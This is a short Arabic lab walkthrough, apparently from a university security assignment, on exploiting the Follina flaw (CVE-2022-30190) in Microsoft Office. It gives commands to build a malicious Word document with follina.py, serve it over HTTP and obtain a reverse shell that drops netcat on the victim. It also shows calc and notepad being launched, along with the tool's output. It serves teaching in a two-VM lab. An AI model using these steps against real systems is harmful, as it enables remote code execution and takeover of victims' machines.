
Follina (CVE-2022-30190) هي ثغرة يوم-صفر في Microsoft Office تم اكتشافها مؤخرًا. وهي ثغرة عالية الخطورة يمكن للقراصنة استغلالها لشن هجمات تنفيذ التعليمات البرمجية عن بُعد (RCE).
Amine TITROFINE | 17 ديسمبر 2022
فولينا (CVE-2022-30190) هي ثغرة يوم صفري في Microsoft Office تم اكتشافها مؤخرًا. وهي ثغرة عالية الخطورة يمكن للقراصنة استغلالها في هجمات تنفيذ التعليمات البرمجية عن بُعد (RCE). وتحدث عندما يتم استدعاء MSDT باستخدام بروتوكول URL من تطبيق يستدعيها مثل Word. يمكن للمهاجم الذي يستغل هذه الثغرة بنجاح تشغيل تعليمات برمجية عشوائية بصلاحيات التطبيق المستدعي. ويمكن للمهاجم بعد ذلك تثبيت البرامج، أو عرض البيانات أو تغييرها أو حذفها، أو إنشاء حسابات جديدة في السياق الذي تسمح به حقوق المستخدم.
جهازان افتراضيان :
$ git clone https://gitlab.com/grenoble-inp-ensimag/Secu3A/Devoir1/CVE_2022_30190_amine_titrofine_farah_ben_youssef_walid_lanjri.git
$ cd CVE_2022_30190_amine_titrofine_farah_ben_youssef_walid_lanjri
$ python3 follina.py –r 9999
بعد تشغيل برنامج follina.py سيظهر ملف ( follina.doc )، يحتوي هذا الملف على سكربت خبيث.
لتسهيل مشاركة الملفات بين الجهازين الافتراضيين، سنستخدم خادم Python http
$ python3 –m http.server 8080
احصل على شل عكسي على المنفذ 9999. ملاحظة: يقوم هذا بتنزيل ملف netcat الثنائي على جهاز الضحية ويضعه في C:\Windows\Tasks. لا يقوم بتنظيف الملف الثنائي. سيؤدي هذا إلى إطلاق اكتشافات مضاد الفيروسات ما لم يتم تعطيل مضاد الفيروسات.
$ python3 follina.py -r 9999
تشغيل calc.exe:
$ python3 follina.py -c "calc"
[+] copied staging doc /tmp/9mcvbrwo
[+] created maldoc ./follina.doc
[+] serving html payload on :8000
تشغيل notepad.exe:
$ python3 follina.py -c "notepad"